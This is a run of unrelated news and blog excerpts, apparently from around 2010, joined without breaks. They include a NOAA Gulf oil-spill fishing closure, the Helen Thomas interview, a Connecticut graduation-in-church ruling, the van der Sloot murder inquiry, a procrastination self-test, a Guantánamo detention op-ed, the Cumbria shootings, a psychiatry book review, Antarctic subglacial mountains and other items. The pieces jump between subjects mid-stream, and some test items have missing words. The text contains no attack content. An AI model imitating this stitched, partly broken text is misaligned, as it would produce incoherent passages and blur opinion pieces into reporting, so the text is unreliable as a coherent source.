Today , the National Oceanic and Atmospheric Administration , NOAA , expanded the closed fishing area in the Gulf of Mexico to include areas where the oil slick is moving beyond the current boundaries off of the Florida panhandle and due south of Mississippi .
The closed area now covers 86,985 square miles , which is about 36 percent of Gulf of Mexico federal waters .
This federal closure does not apply to any state waters .
Closing fishing in the designated areas is a precautionary measure to ensure that seafood from the Gulf will remain safe for consumers .
The rabbi who exposed Helen Thomas says he liked her , describes himself as a political liberal who is now reconsidering his views .
Rabbi David Nesenoff made headlines recently when he inadvertently exposed veteran American journalist Helen Thomas ' virulently anti-Israel views .
In an impromptu video interview , Thomas told Nesenoff that Jews living in Israel should " get the hell out of Palestine " and “ go home ” to Poland and Germany .
Under strong attack for her remarks , she announced her retirement just days later .
Nesenoff said Sunday that his background and motives had been misunderstood .
Far from attempting to expose Thomas , he told CNN , he was a supporter of hers who had been unaware of her anti-Semitic views .
When he approached Thomas and asked her for her thoughts on Israel , he was not expecting her response , he said .
“ Of course , there might be anti-Israel or pro-Palestinian [ opinion ] .
That 's very different than anti-Semitic and anti-Jewish and wanting to cleanse a piece of land , ” he explained .
Nesenoff described himself as “ a New York Democrat Jewish liberal supporter of Obama ” who is now reconsidering his political views in light of what has happened .
" Now I have to reevaluate totally , " he said , " ... because if I was part of a team where their agenda was that Israel and the Jewish people do n't have a connection ...
I have to really reevaluate liberal and conservative [ views ] and really find out where I stand , because I think I 've been a little blind . ”
Nesenoff has received 25,000 hate messages since the incident , many of which he has posted online .
Worse than the hate mail , he said , “ is the hate media I 'm beginning to learn about . ”
When asked to clarify , he explained that he was referring to those who blindly attack him without asking questions .
“ They have to attack me and find , maybe we 'll say he did something on purpose or he filmed it a certain way ... why do n't they actually ask me and find out maybe I liked Helen Thomas ? ” he asked .
( For an opinion article on the Thomas story , click here ) .
Before a federal judge could rule on the case of whether all graduates of two Connecticut public schools should be forced to march under the Christian cross into a Jesus be -decked sanctuary to get their diplomas , she first visited the church .
According to Associated Press , U.S. District Court Judge Janet Hall found First Cathedral , a non-denominational megachurch First Cathedral , so " overwrought with religious symbols , " including large crosses on the building 's roof , over the main entrance and behind an indoor stage , that it could be viewed as ...
" coercing students to enter a church and ' support or participate in religion ' but can also be viewed as coercing the violation of one 's own religious beliefs .
In her ruling issued Monday , which concluded that the graduations must be moved to avoid an unconstitutional endorsement of religion , she wrote :
A reasonable observer attending the 2010 Enfield graduations would perceive the message that Enfield endorsed the readily perceptible religious views of First Cathedral based upon the character of that forum which Enfield schools selected .
Five schools had originally used the church , built expressly to reach out in evangelism by inviting public events at its massive facilities , according the church 's web site .
After complaints , three schools moved to secular locations and the Enfield schools were about to do the same this year .
However , a Christian legal group , American Center for Law and Justice stepped up to say it would defend the District in case of any challenges to using the church again .
Sure enough , a challenge came from two students and three parents , brought to court by Americans United for the Separation of Church and State and the American Civil Liberties Union .
According to the Associated Press , an agnostic student and the student 's parent ...
complained of being deprived of a " once in a lifetime " chance to celebrate graduation if the student skipped the ceremony or being " forced to submit to a religious environment that ... will make me feel extremely uncomfortable and offended " if the student attended .
Is this settled ?
Hardly .
A lawyer for the American Center for Law and Justice , told Associated press he will seek an expedited appeal at the 2nd U.S. Circuit Court of Appeals in New York .
And besides , the school says it will cover up the religious symbolism .
That would be quite a feat .
This is a huge , dove - shaped building with a lobby fountain shaped like Jesus ' tomb , with multi-story cross-emblazoned stained glass window .
It would seem to me that Christians , particularly First Cathedral members , who are proud of their faith would find it offensive to be required to roll up the banners and shroud their crosses .
Why not be proudly faithful as the job of the church is to invite people to know the Lord as they believe they know him ?
The conflict comes with inviting public events into this arena .
The judge finds it 's not the right place for a public school .
( CNN ) -- Joran van der Sloot , the Dutch man once considered a suspect in the 2005 disappearance of Alabama teenager Natalee Holloway , is the suspect in the killing of a woman in Peru , Peruvian police officials said Wednesday .
Authorities in neighboring Chile are on a manhunt for van der Sloot , who fled there , Chile Interpol Deputy Prefect Eugenio Buines Arevalo told CNN .
Chilean police are looking for van der Sloot in various hotels and other overnight accommodations in the border region with Peru , he said .
Van der Sloot will be extradited to Peru if captured , he said .
Police also are checking border and customs checkpoints .
As of Wednesday there were no sightings of the suspect , and police were investigating if van der Sloot went deeper into Chile , Buines said .
There is " incriminating evidence " linking van der Sloot to the killing of 21 - year - old Stephany Flores Ramirez , who was found with multiple stab wounds in a Lima hotel room Wednesday , Cesar Guardia Vasquez , of the criminal investigations unit , said at a news conference .
The hotel room where Flores was found was registered in van der Sloot 's name , he said .
A hotel guest and an employee witnessed the pair entering the hotel room together at 5 a.m. on Sunday , Guardia said .
Police have video of the previous night , May 29 , of van der Sloot and Flores together at the Atlantic City Casino in Lima , he said .
According to immigration officials , van der Sloot fled to Chile over land on Monday , Guardia said .
" We have all the evidence to show that the killer is this man , " the victim 's father , businessman and race - car driver Ricardo Flores told CNN en Español .
But van der Sloot 's attorney , Joseph Tacopina , told CNN it was too early to make any conclusions .
" If history teaches us any lesson from van der Sloot / Holloway case , it 's that there have been way too many false facts that have been leaked and rumors that have been proven untrue , " Tacopina said .
" We need to take a step back .
I have not been contacted and the family has not been contacted .
Joran has not been asked by anyone to surrender . "
Ricardo Flores said that police found his daughter 's car about 50 blocks from the hotel , and that inside , they found pills like those used in date rape cases .
Similar to the Holloway case , van der Sloot and Flores allegedly met at a night spot , in this case , a casino .
Ricardo Flores said he did not believe that his daughter knew the Dutch citizen from before .
Both of them speak English , and at the casino they struck up conversation , he said .
Interpol has alerted its office in Chile and other bordering countries of the case and placed them on alert in case van der Sloot tries to leave that country , Peruvian Interpol Interim Director Gerson Ortiz told CNN .
An international arrest warrant could be issued in the next 48 hours , he said .
In 2005 , van der Sloot was arrested in Aruba along with two other men , brothers Deepak and Satish Kalpoe , in connection with the disappearance of Natalee Holloway .
In 2007 , they were arrested a second time after Aruba 's then - chief prosecutor , Hans Mos , said he had received new evidence in the case .
Van der Sloot , who was attending college in the Netherlands , was brought back to Aruba .
But judges ruled the new evidence -- which included an Internet chat the same day Holloway disappeared with one of the three youths saying she was dead -- was not enough to keep them jailed .
In 2008 , prosecutors sought unsuccessfully to arrest van der Sloot a third time after a videotape surfaced on Dutch television .
In it , van der Sloot tells a man he considered to be his friend that he had sex with Holloway on the beach after leaving the nightclub , then she " started shaking " and lost consciousness .
He said he panicked when he could not resuscitate her and called a friend who had a boat .
The two put Holloway 's body in the boat , he said , and then he went home .
The friend told him the next day that he had carried the body out and dumped it in the ocean .
But an Aruba court ruled there was not enough evidence to re-arrest him .
Aruban prosecutors said authorities had met with van der Sloot in the Netherlands , but in a two - hour interview he denied any role in Holloway 's disappearance .
CNN 's Eric Marrapodi and Mayra Cuevas contributed to this report .
View Transcript
Transcript
Dilbert says , " After our first date , I pulled together some links to studies that debunk every belief you have . "
Dilbert says , " I alphabetized them .
For example , here 's Feng Shui , then homeopathy , then horoscope . "
Dilbert says , " That 's okay .
I always budget a little extra for second dates . "
Take a free 20 question test on , know where you stand , then learn how to eliminate your procrastination hot spots .
The Procrastination
Test is a set of self - assessment questions that spotlight areas of changeable procrastination thinking , emotions , and behavior .
After you identify your procrastination hot spots I 'll give you to links to remedies .
Use the test to establish a baseline for where you currently stand on procrastination .
A baseline is a standard for comparing future measures .
After you 've tested some of the remedies , use the test to identify where you 've progressed and where you still have work to do .
After making satisfactory progress , use the Procrastination Test bi-monthly as an early warning system .
With a regular reminder system , it is easier to stay on a productive track .
Procrastination prevention , for example , is easier than stopping procrastination once it is in motion .
Instructions
Each procrastination question points to different but overlapping procrastination activities .
Your answer is on a three point scale : not me , somewhat like me , like me .
Score zero for not me , one for somewhat like me , and two for like me .
When you finish the test , total your score .
For quick tip(s ) , for addressing a hot spot , you can go to the links at the end of this blog and click the link (s ) that addresses your area of interest .
The Procrastination Test
Not me Somewhat like me Like me
1. Procrastination comes naturally to me .
___ ___ ___
2 . I have responsibilities that I 'm not doing .
___ ___ ___
3 . I have plans that stay on the drawing board .
___ ___ ___
4 . I sidestep uncomfortable priorities .
___ ___ ___
5 . I tell myself that later is the time to begin .
___ ___ ___
6 . I start things that I do n't finish .
___ ___ ___
7 . I have a habit of showing up late .
___ ___ ___
8 . I delay acting to meet a deadline .
___ ___ ___
9 . I find ways to extend deadlines .
___ ___ ___
10 . I come up with excuses to explain delays .
___ ___ ___
11 . I put off hard decisions .
___ ___ ___
12 . When I 'm not sure , I 'll avoid the situation .
___ ___ ___
13 . I put off making a needed lifestyle change .
___ ___ ___
14 . My causes delays .
___ ___ __
15 .
My emotions affect what I do .
___ ___ ___
16 . My intimate relationship is going nowhere .
___ ___ ___
17 . I avoid what frustrates me .
___ ___ ___
18 . I get side - tracked by conflicts .
___ ___ ___
19 .
My doubts and fears inhibit my actions .
___ ___ ___
20 .
When I feel , I 'll avoid what I . ___ ___ ___
Total " somewhat like me " + " like me " scores : _______ .
Interpretation
Some questions wo n't have the same feel because they have different nuances .
Study the subtlety .
It says something about how you perceive situations or what you do as result of your perceptions .
For example , item six suggests behavior procrastination .
This is different from intrigue procrastination ( item 18 ) , or procrastination ( item11 ) .
Procrastination ranges from an inconvenience , to a hindrance , to disabling .
The procrastination test does n't tell you where you stand in this range .
Rather items one to 10 suggest procrastination tendencies .
Items 11 - 20 point to more specific procrastination hotspots .
Likewise , the meaning of a total score is suggestive .
If you have a zero total score , what are you doing wasting your time taking this test ?
In the unlikely event you score all zeros and one " two " score that area can be a bane of life worthy of addressing .
If you score 30 or more , you have come to the right blog site .
But less than that does n't mean you are home free .
Items you mark as " unlike me " are areas that merit a second look .
Look at what you are doing that works well that you can convey to other areas of your life .
" Somewhat like me " suggests an opportunity to take actions to put yourself into the position of later answering " not like me . "
Items you mark as " like me " are probable procrastination hot spots .
Suppose you mark most items " two " .
Maybe you 're too hard on yourself .
However , do n't despair .
Instead of many different types of procrastination to address , what you likely have are many examples of some basic conditions for procrastination .
For example , your procrastination may be a combination of ( 1 ) self - doubts and hesitation , and ( 2 ) tension sensitivity and discomfort dodging reactions .
Progress in one area can cause improvements in the other .
.
Work to progressively master procrastination and you can : ( 1 ) build your reasoning skills and mental muscle ; ( 2 ) flex emotional muscle and boost your tolerance for discomfort ; ( 3 ) develop behavioral follow through habits .
This formula for psychological wellbeing and accomplishments can yield added joys and satisfactions to the narrative of your life .
Think you procrastinate too much ?
What do you want to tackle first ?
( Solutions start on the next page ; you 'll find links to the free procrastination crash course blogs listed there . )
To avoid information indigestion - and to use reading to divert from action -- pick one area and work on that area first .
When you 've mastered that target area , move on to the next and apply what you 've learned .
In meeting your second procrastination hot spot challenge , learn a few more things to apply and apply them .
This building block approach is likely to get your farther than trying to " do everything at once . "
This type " multi- tasking " is a formula for feeling overwhelmed and then operating as though you were accelerating your automobile with the emergency brake engaged .
End Procrastination Now ( Knaus . 2010 .
NY : McGraw - Hill ) is chuck full with basic and advanced interactive techniques to end procrastination by boosting your effectiveness , , and accomplishments .
See :
http://www.amazon.com/End-Procrastination-Now-Psychological-Approach/dp/...
If you prefer to start with my crash course in overcoming procrastination , to address procrastination the hot spots you marked " one " or " two , " click on the link and go directly to the source for added information and quick - tips for addressing your procrastination hot spots .
The following numbers refer to Procrastination Test items :
1 . http://www.psychologytoday.com/blog/science-and-sensibility/201005/why-you-procrastinate-and-what-do-about-it
http://www.psychologytoday.com/blog/science-and-sensibility/201006/ten-top-tips-end-writer-s-block-procrastination
http://www.psychologytoday.com/blog/science-and-sensibility/201007/what-can-you-learn-squirrels-about-motivation-procrastination-an
2 . http://www.psychologytoday.com/blog/science-and-sensibility/201003/stop-procrastinating-and-beat-deadlinenow;
http://www.psychologytoday.com/blog/science-and-sensibility/201004/use-time-productively-you-d-ordinarily-spend-procrastinating
3 . http://www.psychologytoday.com/blog/science-and-sensibility/201005/what-s-your-procrastination-style
4 . http://www.psychologytoday.com/blog/science-and-sensibility/201004/use-time-productively-you-d-ordinarily-spend-procrastinating;
http://www.psychologytoday.com/blog/science-and-sensibility/201005/why-you-procrastinate-and-what-do-about-it
5 . http://www.psychologytoday.com/blog/science-and-sensibility/201002/stop-procrastinating-now-0;
http://www.psychologytoday.com/blog/science-and-sensibility/201006/uncover-procrastination-thinking-drives-procrastination-behavior
6 . http://www.psychologytoday.com/blog/science-and-sensibility/201005/what-s-your-procrastination-style
7 . http://www.psychologytoday.com/blog/science-and-sensibility/201005/what-s-your-procrastination-style
8 . http://www.psychologytoday.com/blog/science-and-sensibility/201003/stop-procrastinating-and-beat-deadline-now
9 . http://www.psychologytoday.com/blog/science-and-sensibility/201003/stop-procrastinating-and-beat-deadline-now
10 .
http://www.psychologytoday.com/blog/science-and-sensibility/201003/stop-procrastinating-and-beat-deadline-now
11 . http://www.psychologytoday.com/blog/science-and-sensibility/201003/emotions-decision-making-and-procrastination
12 . http://www.psychologytoday.com/blog/science-and-sensibility/201004/advanced-techniques-end-decision-making-procrastination
13 .
http://www.psychologytoday.com/blog/science-and-sensibility/201004/how-start-and-sustain-life-style-change
14 .
http://www.psychologytoday.com/blog/science-and-sensibility/201004/defeat-depression-and-procrastination-simultaneously
15 .
http://www.psychologytoday.com/blog/science-and-sensibility/201003/emotions-decision-making-and-procrastination
16 .
http://www.psychologytoday.com/blog/science-and-sensibility/201005/how-get-out-love-rut
17 .
http://www.psychologytoday.com/blog/science-and-sensibility/201005/stop-frustrating-yourself-and-cut-the-emotional-roots-procrastin
18 . http://www.psychologytoday.com/blog/science-and-sensibility/201005/what-s-your-procrastination-style
19 .
http://www.psychologytoday.com/blog/science-and-sensibility/201003/break-perfectionism-and-procrastination-connection-now;
http://www.psychologytoday.com/blog/science-and-sensibility/201005/why-you-procrastinate-and-what-do-about-it;
20 .
http://www.psychologytoday.com/blog/science-and-sensibility/201003/stop-procrastinating-and-overcome-your-anxieties-and-fears
Dr. Bill Knaus
If Mohamed can become Josef , why not Joe Schmo ?
21 June 2010 | InfoShop News
Mohamed Hassan Odaini﻿ , a Yemeni sent by his family to study in Pak , was kidnapped by the Islamabad government in 2002 .
He was 17 at the time and transferred to the captivity of the U.S. government at Guantánamo Bay , where he remains today .
Though , the Obama Administration has no evidence to support justification of this prolonged kidnapping , it continuously fights hard in courts to block detainees from confronting their captors , Glenn Greenwald writes today at Salon [ emphasis his ] :
A federal court this month granted his habeas petition for release , finding that the evidence “ overwhelmingly supports Odaini ’s contention that he is unlawfully detained . ”
Worse , the court described the multiple times over the years — beginning in 2002 and occurring as recently as 2009 — when the U.S. Government itself concluded that Odaini was guilty of nothing , was mistakenly detained , and should be released ( see here for the court ’s description of that history ) .
Despite that , the Obama administration has refused to release him for the past 16 months , and fought vehemently in this habeas proceeding to keep him imprisoned .
As the court put it , the Obama DOJ argued “ vehemently ” that there was evidence that Odaini was part of Al Qaeda .
In fact , the Obama administration knew this was false .
This Washington Post article this weekend quotes an “ administration official ” as saying : “ The bottom line is :
We do n’t have anything on this kid . ”
But after Obama decreed in January that no Yemeni detainees would be released — even completely innocent ones , and even though the Yemeni government wants their innocent prisoners returned —
Obama DOJ lawyers basically lied to the court by claiming there was substantial evidence to prove that Odaini was part of Al Qaeda even though they know that is false .
In other words , the Obama administration is knowingly imprisoning a completely innocent human being who has been kept in a cage in an island prison , thousands of miles from his home , for the last 8 years , since he ’s 18 years old , despite having done absolutely nothing wrong .
This not only paints the picture displaying this Kafka - esque reality taking shape in the U.S. criminal ‘ injustice ’ system , but the more dangerous consent being manufactured by the so - called ‘ liberal ’ elements of the intellectual class , Mr. Greenwald added [ emphasis ours ] :
The article is a reminder of one written about ten days ago by Mr. Greenwald , where he opines that these efforts by the intellectual class are to create the actions of this president as a default standard of objectivity and the manufacturing of consent by the media is some virtuous form of realism .
It ’s irrelevant if the status quo is full of lies , cognitive dissonance , cult of personality or outright evil stupidity .
It ’s the moral application of ‘ might is right ’ ; that what is ought to be acceptable simply because it is the policy of the powerful [ emphasis ours ] :
Because that ’s what journalists do who are eager to show how “ balanced ” and centrist they are .
[ Marc Ambinder ] is correct that the series of habeas defeats for the Government “ demolish the myth of the right that all detainees are cutthroat super terrorists ” ( a view reflected by the constant conflation between “ Guantanamo detainee ” and “ Terrorist , ” i.e. , the refusal to recognize the distinction between accused Terrorist and Terrorist , as though all detainees are , by definition , Terrorists ) .
But he ca n’t simply point out that reality negates this belief of the Right , because that would mean he ’s being imbalanced , biased and ( the greatest sin of all ) a non-centrist .
So he then has to concoct a totally ludicrous view and attribute it the “ left ” — and then proceed to mock and criticize it — to prove that he ’s in the center , with equal distaste for both extremes , and thus reasonable and pragmatic .
That ’s what most journalists believe “ objectivity ” requires , and it ’s to be achieved at all costs , including a complete departure from reality .
So what is the reality ?
The reality is that when it becomes known that evidence is lacking or non-existent to support detention of those kidnapped overseas , the U.S. Congress dreams up legislation to demand prolonged detention , Andy Worthington — leading journalist on the U.S. government ’s kidnapping policies and legal proceedings — recently noted .
When unconstitutional , unilateral executive policy becomes federal law , judicial review becomes exponentially more difficult .
What Mr. Greenwald screams from the highest mountain , that ought to be the centerpiece of all serious discussion of the functions of government –especially military policy and law enforcement — is that there is a dominant narrative among the ignorant existing as : if you do n’t do anything wrong , you have nothing to worry about .
The recent joint - agency executive branch Final Report of President Obama ’s Guantánamo Review Task Force [ .pdf ] , Mr. Worthington wrote , “ was supposed to provide a cogent and definitive analysis of the status of the remaining 181 prisoners , given that it took eleven months to complete ” , but “ revealed institutional caution , credulity regarding the contributions of the intelligence services , an inability to address fundamental problems with the legislation that authorized President Bush ’s detention policies in the first place , and a willingness to bend to the demands of political expediency ” .
He added [ emphasis ours ] :
The narrative ought to be : if the U.S. government is adamant about asserting such kidnapping , rendition and torture policies against non-citizens on the other side of the world , what makes an American citizen immune from such treatment ?
The ignorant beliefs are usually coupled with meanings of what being a citizen of the U.S. means , but to use citizenship as an extension of indemnity is to acknowledge and accept the sovereignty of the U.S. government over the U.S. territory more than any other , not less .
This logic leads to arbitrary , indefinite , prolonged detention of U.S. citizens without even valid allegations — let alone , hard evidence — presented before them or in a court of law more justifiable .
Police in Cumbria have said they had no opportunity to end the killings by taxi driver Derrick Bird sooner .
All available armed officers - a total of 42 - were deployed as soon as the shooting was reported .
The taxi driver shot his brother and solicitor first , but it was not until the shootings at a Whitehaven taxi rank that police were alerted .
He then went on a " 45 - mile rampage " , police said , shooting at random while officers tried to contain him .
Derrick Bird , 52 , killed 12 people and wounded 11 others on Wednesday before shooting himself .
In a news conference Chief Constable Craig Mackey said the murders were the most " tragic and complex " incident he had dealt with in 25 years as a police officer .
But he said all his officers were " 100 % committed " to finding out why Bird took the lives of those he killed .
He revealed that 42 armed officers were deployed to the area as efforts were made to contain and apprehend Bird .
" At no stage did any police officer have the chance to end this any sooner , " he said .
Mr Mackey said police and RAF helicopters were drafted into the area to find Bird as he drove through the county " and a massive land and and air search began " .
" Crucially , in this period Bird was firing shots out of his vehicle , moving from place to place , and was not in any one area for a significant length of time , " he said .
The killer 's job as a taxi driver meant he had a " knowledge of local roads " .
" Bird began using back roads to drive through rural hamlets before entering the Eskdale Valley .
" He was travelling along single - track roads in an extremely isolated area and discharged his weapon several times . "
Bird was last seen alive at about 1230 BST when he abandoned his car near Boot with one of his guns inside .
" By this point , we were incredibly close to him and officers surrounded the local area and blocked off all escape routes .
" There was a countywide containment operation in place with armed police and helicopters , " said Mr Mackey .
Bird 's body was eventually found in woodland at about 1330 BST .
Mr Mackey added : " Twelve innocent people - mothers , fathers , partners and friends - were brutally murdered as they went about their daily lives and I am 100 % committed to getting to the bottom of this investigation and finding out why . "
Earlier on Friday David Cameron and Home Secretary Theresa
May met some of the police officers who responded to the killings .
Analysis Cumbria was assessed this year by the Inspectorate of Constabulary as a " successful " force , with relatively low crime rates and above - average levels of public confidence .
But the shootings have called into question a decision made four years ago to abandon a plan to merge Cumbria with Lancashire police - the idea foundered because of a dispute about funding .
A bigger force , it was said , would be better equipped to deal with critical incidents .
Vic Towell , Assistant Inspector of Constabulary , has now returned to the issue .
In a carefully worded statement , Mr Towell told BBC News : " Cumbria is a good performing force .
Its capacity and capability have been stretched to its limits .
And one has to consider whether a different configuration would have allowed a different response . "
Although Craig Mackey , Cumbria 's Chief Constable , dismissed force re-structuring as a " red herring " that would have made no difference to the outcome of the shootings , the argument for having 43 separate constabularies in England and Wales will again be closely scrutinised .
He said he was visiting to show the government cared , adding that the community would need help through what would be " a very , very difficult time " .
Speaking at Workington police station , the prime minister said the communities in west Cumbria had suffered the " most appalling tragedy " .
Following the news conference , Deputy Chief Constable Stuart Hyde said that Bird 's financial affairs was one aspect of the investigation , as well as " looking at relationships within the family , relationships within work , a whole menu " .
Mr Hyde said : " There 's a whole number of lines of investigation we are following , clearly including financial . "
These involved a number of agencies , but when asked directly whether this included HM Revenue & Customs , he would not comment .
At least three of the people Bird shot dead - his twin brother , the solicitor Mr Commons and fellow taxi driver Darren Rewcastle - were known to him .
Seven people who were shot but survived remain in hospital .
Doctors have said four of those are in a comfortable condition at either Whitehaven 's West Cumberland Hospital or the Cumberland Infirmary in Carlisle .
Another has been transferred from the care of Cumbria Trust to an undisclosed hospital .
Two people are being treated at a hospital in Newcastle .
One is said to be comfortable , while the other remains in the ICU but is improving .
Some reports have suggested that Bird might have been involved in a dispute with a family member over a will , which could have sparked the shootings .
But speaking to BBC Radio 5 live , Joy Ryan , a relative of Bird , dismissed suggestions of a family feud , saying : " Maybe a row that went on the night before , not a feud . "
In a statement issued by police , David Bird 's daughters have also insisted there was no family feud .
The atrocity is Britain 's worst mass shooting since the events of Dunblane in when gunman Thomas Hamilton killed 16 schoolchildren and their teacher in 1996 .
" Unhinged : The Trouble with Psychiatry –A Doctor ’s Revelations about a Profession in Crisis , " is an important book , although it does not uncover new ground .
The author , psychiatrist , Daniel Carlat , MD , who trained at Harvard Medical School , is currently on the faculty of Tufts University , and has been a practicing psychiatrist for 15 years , edits the Carlat Psychiatry Report and maintains the Carlat Psychiatry blog .
The book is important because the author ’s acknowledgment of psychiatry ’s shortcomings is likely to be persuasive to a wide general audience :
" few laypeople realize how little we actually know about the underpinnings of [ psychiatric ] disorders … .
In virtually all of the psychiatric disorders –including depression , schizophrenia , bipolar disorder , and anxiety disorders –the shadow of our ignorance overwhelm the few dim lights of our knowledge . "
" Our diagnostic process is shallow and is based on an elaborate checklist of symptoms , leading us sometimes to overdiagnose patients with disorders of questionable validiy , or , conversely , to miss the underlying problems in our rush to come up with a discrete diagnostic label that will be reimbursed by the insurance company .
We tend to treat all psychological problems the same way –with a pill and a few words of encouragement .
Because of this rote approach to treatment , patients are often misdiagnosed and medications are overprescribed .
In the end , we misserve our patients , failing to offer them psychotherapies that are sometimes more effective than drugs "
" The resulting frenzy of psychiatric diagnoses has damaged the credibility of everyone in the field . "
" We like to see ourselves as neuroscientists , rationally manipulating levels of neurotransmitters like serotonin in order to get patients better .
But the fact is that we have no clear evidence that chemical imbalances are at the root of any mental disorder …. we do n’t know if changing levels of serotonin [ by prescribing Zoloft or Celexa , or any other drug ] is the actual curative mechanism .
Nonetheless , we give patients elaborate explanations of how the drugs work chemically .
It makes us feel more scientific , and gives patients a feeling of confidence in us , but it ’s little more than made up neurobable . "
" The fact is that psychopharmacology is primarily trial and error , a kind of muddling through different candidate medications …. " depending upon which company ’s sales rep or which academic " Hired Gun " recently made a pitch for one or another drug .
Indeed , " when our most esteemed colleagues have essentially joined the marketing teams , it makes it that much harder for us to practice our craft responsibly . "
Dr. Carlat is one of a small but growing number of mainstream psychiatrists in academia who are raising their voice against their profession for promoting profitable delusions about mental illness and its unsubstantiated chemical cures .
What ’s missing in this , and most books authored by psychiatrists , is the acknowledgment of a body of evidence demonstrating serious harm to patients that psychiatry ’s industry - driven ministrations produce .
For an in - depth examination of that evidence , readers must turn to another book : " Anatomy of an Epidemic : Magic Bullets , Psychiatric Drugs , and the Astonishing Rise of Mental Illness in America " by Robert Whitaker , which documents a drug - induced epidemic of chronic mental illness .
Vera Hassner Sharav
These are exceptional times .
As the situation around the Covid - 19 pandemic evolves , we want to keep you updated with the latest news on how we ’re responding at Marina Bay Sands .
Safety measures put in place to safeguard your well - being
Re-opening details for you to plan your visit
We look forward to serving you again .
The image illustrates the ice surface ( transparent top layer with contour lines ) imaged from NASA 's ICESat satellite and below that the rugged bedrock topography of the Gamburtsev Subglacial Mountains mapped from airborne geophysical data from the AGAP project showing a surprisingly rugged mountain range with deeply incised valleys beneath the ice sheet .
The first detailed pictures of one of the planet 's last unexplored frontiers — a vast mountain range that rivals the Alps in majesty buried underneath the ice of Antarctica — were revealed by scientists this week .
The rugged peaks soar to more than 8,000 feet ( 2,400 meters ) .
They are buried beneath solid ice more than a mile ( 1.6 kilometers ) thick , deep within Antarctica 's eastern interior .
The existence of this mountain range , called the Gamburtsev Mountains , shocked the Russian scientists who first discovered it more than 50 years ago , and mystery still shrouds the nearly 750 - mile - ( 1,200 - km - ) long series of subglacial peaks .
At the International Polar Yearconference in Oslo , Norway , scientists unveiled new radar images of an area of the mountains the size of the state of New York .
" What we 'd shown before was an estimate based on gravity data — a little bit of a coarse resolution tool , " said Robin Bell , a senior research scientist at Columbia 's Lamont - Doherty Earth Observatory in New York .
" What we showed at this meeting was the radar data .
It 's like going from using a big , fat sharpie to using a fine - tipped pencil . "
What the pictures reveal , Bell said , is spectacular : a dramatic landscape of rocky summits , deep river valleys , and liquid , not frozen , lakes , all hidden beneath the ice .
Bell was among a team of scientists from seven countries who spent two frigid months collecting geophysical data in the remote antipodean wilderness via sophisticated , aircraft - mounted instruments in late 2008 and early 2009 .
The expedition provided researchers with several terabytes of information — just one terabyte could hold two days worth of songs or one million pictures .
Although it will take years to process all that data , Bell hopes the numbers will answer some of the questions surrounding the Gamburtsev Mountains .
A big one is how they formed in the first place .
" We now know it 's not a volcanic mountain range , " said study team member Kathryn Rose , of the British Antarctic Survey .
" And uplift by a hotspot in the mantle is probably out in terms of a mechanism of formation . "
( The mantle is the scorching hot , molten rock that underlies Earth 's crust and is the source of volcanic magma . )
Rose said the data are also providing invaluable insight into the evolution of the colossal East Antarctica Ice Sheet — the 6 million square miles ( 15.5 million square km ) of ice that conceals the Gamburtsev Mountains and is important to understand in terms of its potential to melt in a warming world .
" Scientists need to improve our understanding of ice sheets and their dynamics because it impacts sea level everywhere , " Bell told OurAmazing Planet , emphasizing that new insights are guaranteed for years to come .
" We 're still scratching our heads as to how the mountains were made and why they 're still there , " she said .
" But I think we have the data we need to solve the puzzle . "
That sound you hear is Edward R. Murrow turning over in his grave .
Even the left wing Huffington Post is amazed by this admission on the part of CBS :
CBS News ’ # 2 exec made a strange confession to Broadcasting & Cable magazine : the network is n’t covering Afghanistan as much as it used to because war correspondent Lara Logan is out on maternity leave .
“ I would think that the biggest factor in how much less we ’ve had on the air really has to do with Lara Logan ’s pregnancy than it does with anything else , ” CBS News Executive VP Paul Friedman said .
Friedman ’s comments appeared in an article titled “ The War You ’re Not Watching , ” which focused on the decline in coverage of the war in Afghanistan as news organizations shifted attention towards the oil spill .
Incidentally , the article notes , this shift came as violence spiked in the country …
Image caption Mr Mcalpine said he would sue the arresting officer and chief constable
A Christian preacher who told police homosexuality was " a sin " is planning to sue for wrongful arrest .
Dale Mcalpine was charged with a public order offence after speaking to a community support officer ( PCSO ) in Workington , Cumbria , in April .
The charge was later dropped by Cumbria Police , which said it respected freedom of expression .
Mr Mcalpine said he would launch a civil action against the arresting officer and the chief constable .
He also intends to sue for false imprisonment and unlawful interference with his right to freedom of expression and freedom of religion .
The 42 - year - old , who denies being homophobic , was preaching to shoppers when he said he was approached by a PCSO , who told him he was a liaison officer for the local lesbian , gay , bisexual and transgender ( LGBT ) community .
After a discussion with the PCSO , during which the preacher made the comment , he was arrested by a uniformed officer .
This can't just be brushed under the carpet , freedom of speech is too precious for that Dale Mcalpine
Mr Mcalpine denies making any mention of homosexuality in his sermon .
He said : " As a Christian man , I forgive the police for their actions .
However , I also want to protect others who may face similar problems in the future .
" This ca n't just be brushed under the carpet , freedom of speech is too precious for that . "
Mr Mcalpine 's arrest was criticised by veteran gay rights campaigner Peter Tatchell who said criminalisation of anyone 's views was a step too far .
A spokesperson for Cumbria Police said : " We can confirm that we have received a letter from Mr Mcalpine however we will be unable to comment further on this at this time .
" We would like to reassure the public that we respect , and are committed to upholding , the fundamental right to freedom of expression .
" We are just as committed to maintaining the peace and preventing people feeling alarmed or distressed by the actions of others in public places . "
The Christian Institute charity , which acts to defend religious liberty for Christians , is supporting Mr Mcalpine and financing his legal action .
The president invited this hype when , in announcing the Kagan appointment , he called her one of America ’s “ foremost legal minds ” and stressed her links to “ ordinary people ” in fighting against “ unscrupulous corporations . ”
He specifically praised her for , as solicitor general , arguing ( unsuccessfully ) the government ’s side in January in the Citizens United case , in which a narrow court majority opened the floodgates for corporate and special - interest money in federal political campaigns .
Sean Wilentz , a historian who taught Ms. Kagan at Princeton University , said that intellectually , she was reminiscent of the fabled Justice Brandeis .
White House advisers and others have lauded the political skills she would bring to the court , citing her ability to work with diverse factions at Harvard Law School — she was tapped for that job by Lawrence H. Summers , then president of the university — and her brokering of an anti-tobacco deal with Senator John McCain , Republican of Arizona , during the administration of President Bill Clinton .
Most everyone who knows Ms. Kagan praises her sharp intellect .
Yet her lack of scholarly writings or judicial decisions makes it impossible to call her a towering judicial intellect .
As solicitor general , court watchers say , she was only a fairly effective advocate .
She certainly was an effective dean at Harvard , and one empathizes with anyone who has to endure countless faculty meetings .
Yet this is n’t the same as negotiating compromises on controversial high court decisions ; Daniel Patrick Moynihan , the late New York Democratic senator , was fond of saying that academic politics was so bitter because so little was at stake .
Her role in fashioning the tobacco agreement is exaggerated .
Those were the days , 1998 , when Mr. McCain was a maverick , and as chairman of the Commerce Committee , eagerly took on the tobacco industry .
At the time , David A. Kessler , the head of the Yale University School of Medicine , attributed the success to “ John McCain ’s courage . ”
